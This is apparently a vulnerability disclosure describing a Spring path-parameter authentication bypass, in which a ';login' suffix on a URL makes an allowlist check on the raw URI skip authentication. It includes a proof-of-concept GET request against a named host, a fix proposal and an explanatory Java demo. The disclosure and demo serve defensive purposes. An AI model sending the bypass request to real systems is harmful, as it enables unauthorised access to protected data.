Vulnerability Description: The Spring routing parser ignores any content after ; in the URL (e.g., /;login) when looking up routes, but request.getRequestURI() retrieves the full URI path. This can lead to permission bypasses and unauthorized operations.
Fix Proposal: Use request.getServletPath() to obtain the path.
/api/v1.0/statistics/recentDocs/;login
GET /api/v1.0/statistics/recentDocs/;login HTTP/1.1
Host: alldocs.tech
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: eyJhbGciO
Username: admin123
Referer: https://alldocs.tech/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
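The mismatch described in this report, shown as an added example that is not code from the project or the reporter. It assumes a hypothetical auth filter that skips authentication when the path ends with `login`, and it models the container's removal of `;` path parameters with a regular expression rather than a real servlet request.

```java
import java.util.List;

public class PathParameterBypassDemo {

    // Hypothetical allowlist (assumption): path endings let through without a token.
    static final List<String> PUBLIC_ENDINGS = List.of("login");

    // Simplified model of what happens before route lookup:
    // the ";..." path parameters are dropped from every segment.
    static String withoutPathParameters(String requestUri) {
        return requestUri.replaceAll(";[^/]*", "");
    }

    // Assumed allowlist test: the path ends with one of the public endings.
    static boolean isPublic(String path) {
        return PUBLIC_ENDINGS.stream().anyMatch(path::endsWith);
    }

    // Before: decision taken on the raw URI, as request.getRequestURI() returns it.
    static boolean skipsAuthOnRequestUri(String requestUri) {
        return isPublic(requestUri);
    }

    // After: decision taken on the path the router matches, which is what the
    // fix proposal (request.getServletPath()) is meant to provide.
    static boolean skipsAuthOnServletPath(String requestUri) {
        return isPublic(withoutPathParameters(requestUri));
    }

    public static void main(String[] args) {
        String[] uris = {
            "/api/v1.0/statistics/recentDocs/;login", // path from the report
            "/api/v1.0/statistics/recentDocs",        // same route, no suffix
            "/example/login"                          // constructed public endpoint
        };
        for (String uri : uris) {
            System.out.printf("%-40s routed as %-34s rawCheck=%b fixedCheck=%b%n",
                uri, withoutPathParameters(uri),
                skipsAuthOnRequestUri(uri), skipsAuthOnServletPath(uri));
        }
    }
}
```

The first row is the case to look at: the raw-URI check treats the request as public while the router still dispatches it to the statistics route, and the check on the stripped path does not.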